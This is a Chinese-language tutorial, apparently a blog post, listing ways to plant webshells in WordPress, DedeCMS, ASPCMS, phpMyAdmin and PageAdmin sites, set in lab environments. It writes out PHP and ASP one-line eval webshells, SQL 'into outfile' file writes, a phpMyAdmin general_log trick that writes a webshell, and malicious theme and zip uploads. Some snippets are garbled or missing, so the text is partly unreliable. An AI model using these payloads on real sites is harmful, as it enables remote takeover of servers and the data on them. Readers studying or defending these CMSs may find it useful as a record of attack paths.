常见cms里面的几个cms框架的webshell方法(wordpress,dedecms,phpmyadmin,pageadmin)
WordPress
姿势一:
WordPress是一个以php和mysql为平台的自由开源的博客软件和内容管理系统。
靶场: vulhub/wordpress/pwnscriptum
docker-compose up -d步骤:再以登录的前提下,点外观,编辑下有多个php文件,比如404.php。
可以更新文件,将文件改成木马文件
<?php eval@($_POST[cmd];)?>
然后可以找一个开源的网站着推出他的拼接路径
/wp-content/themes/twentyfifteen/404.php然后我们就可以使用webshell工具连接。
姿势二:
点击外观,主题可上传自定义主题。可以上网下载主题压缩包,将我们的木马文件拖入压缩包中,完成上传后,拼接路径即可用webshell工具连接
/wp-content/themes/qzdy-master/1.phpDeDeCMS
是织梦团队开发PHP网站管理系统。
靶场; DedeCMS-V5.7.82-UTF8.zip
姿势一
搭建好靶场以后,登录到后台点击模块,有个文件式管理器,文件上传功能可以上传我们的木马文件。
姿势二
修改模块文件拿shell,找模块这里
姿势三
后台任意命令拿shell,打开模块,广告管理
内容改成一下内容
然后将提示的地址,拼接到网站路径下即可,用webshell工具连接
姿势四
通过后台执行sql语句拿shell
先查询一下数据库安装根目录
select @@basedir
把输出的地址复制下来,拼接下面写入木马文件的路径。
select ' <?php eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/www/1.php'执行后用webshell工具练级即可
ASPCMS
ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
点击 扩展功能,幻灯片设置,点击 【保存】开启代理进行抓包
改成这样
%25><%25eval (request(chr(65)))%25><%25
PhPmyadmin
先下载一个phpmyadmin
该一下高版本的php,
姿势一
通过日志文件拿shell
查看mysql日志文件是否开启
set global general_log='on'; 
打开变量搜索一下日志文件位置,然后点编辑,将他的日志文件路径改到www下,并把后缀改成php文件 
日志文件是我们不管select什么它都会记录,那我们select木马语句
select ' <?php eval($_POST[cmd]);?>'让他把木马语句写到日志文件中
用webshell工具连接一下
姿势二,导入导出拿shell
这个就和刚才那个into outfile一模一样了
select ' <?php eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/www/1.php'直接写进去用webshell连接工具连接即可
Pageadmin
PageAdmin CMS系统是基于.Net的网站管理系统,安全、稳定、灵活,全国用户超过百万,致力于为 企业、学校、政府网站建设和网站制作提供企业级内容管理系统解决方案。
搭建的时候服务器地址要改一下
姿势一
上传模块拿shell,这个页面,直接上传asp的木马压缩文件,系统会直接解压
然后用webshell连接工具直接连接就好了(注意是免费版的就不要做了,上传插件需要权限)
姿势二
上传文件拿shell
功能菜单里有一个上传文件功能
asp的一句话木马如下,把它写到一个asp文件中然后压缩成zip文件上传即可
<%25eval (request(chr(65)))%25> 
上传成功后点一下解压
